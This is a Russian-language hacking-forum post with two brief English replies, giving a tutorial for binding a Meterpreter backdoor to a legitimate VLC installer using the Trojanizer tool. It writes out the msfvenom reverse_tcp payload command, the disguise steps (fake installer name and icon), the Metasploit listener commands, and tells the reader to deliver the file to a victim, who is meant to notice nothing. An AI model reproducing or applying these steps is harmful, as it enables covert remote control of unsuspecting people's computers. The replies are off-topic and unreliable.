Связка Backdoor'a и файла (Kali)

UndetectedButterFly

Malware Analyst
Joined
Jun 14, 2017
Messages
613
Reaction score
349
Прувет, гайс
1.0

Примечание: Эту тему я особо не читал, делал на скорую руку, так шо не бейте лопатой
Инструмент Trojanizer использует WinRAR (SFX), чтоб сжать два файла между собой и преобразовать их в исполняемый архив SFX (.exe). SFX-архив при работе запускает оба файла (наш payload и легальное приложение одновременно).
Прописываем в консоль:

git clone https://github.com/r00t-3xp10it/trojanizer.git
6ce65d961b997dce0cdd0.png

Далее создаем пейлоад, используя msfvenom
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.111 lport=4466 -f exe > /root/Desktop/backdoor.exe
Запуск:
Переходим в папку с Trojanizer и запускаем Trojanizer.sh файл. У Trojanizer есть зависимости, которые нужны для работы тулзы, он попробует их поставить сам, но в случае неудачи, установите следующие пакеты: Wine Program Files, WinRAR Software and Zenity.

./Trojanizer.sh
После запуска откроется форма для сжатия. Здесь можно выбрать пейлоад, который мы создали, используя msfvenom, в самом начале. После выбора пейлоада, откроется другое окно под названием Legit Application to Trojanize. Далее нужно выбрать любой исполняемый файл (.exe), который хотим связать с нашей нагрузкой. Я связываю VLC Player Installer File с моей нагрузкой. После того, как вы нажмете ОК, необходимо будет задать новое имя для файла. Сохраните его как файл инсталлятор. Например, vlc-32bit-Installer или vlc-update64 или по вашему выбору. Теперь необходимо выбрать иконку для нашего инсталлятора. Вы можете выбрать из списка по умолчанию или загрузить любой файл с иконкой в формате (.ico) из Google. Я добавил файл vlc-icon.ico как иконку.
Примечание: Trojanizer действует с WINRAR и вследствие этого иконка не связывается с архивными файлами. Вместо этого показывается иконка WinRAR.
После выбора файла иконки выпадает окно, сообщающее путь к новому файлу инсталлятору.
А теперь давайте поднимем Listener в Metasploit:

msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload
windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.111
msf exploit(multi/handler) > set lport 4466
msf exploit(multi/handler) > run -j

Отправляем вредоносную программу на машину жертвы любым удобным способом. Когда пользователь откроет файл, он получит обычное предупреждение о безопасности, как показано ниже. После того, как жертва нажмет RUN, у пользователя начнет работать VLC installer, и он ничего не заподозрит. Но в тоже время, у нас будет meterpreter сессия, как показано ниже.
Именно так можно связать файл нашу нагрузку с любым файлом программного обеспечения (.exe) с использованием Trojanizer.

Оригинал - https://graph.org/Svyazka-Backdoora-i-fajla-Kali-12-28
Discord - 蝶UndetectedButterFly1337.pw#0187
vk - https://vk.com/undetectedButterFly
telegram - @UndetectedButterFly

 

bjorn

New member
Joined
Jul 1, 2017
Messages
3
Reaction score
0
I think you'll find a bunch of old tools in Kali's repo are actually deprecated, and even the Backdoor's repo is archived by now. Would be better to look for alternative tools for the job, if they exist.
 

platusha

New member
Joined
Jan 26, 2012
Messages
4
Reaction score
0
I've used Kali Linux for some low-level pentesting, and I'm pretty sure the backdoor is more related to the Kali's underlying Debian distro rather than a specific issue with Kali itself. Anyone have more insight on how to troubleshoot this?
 
Top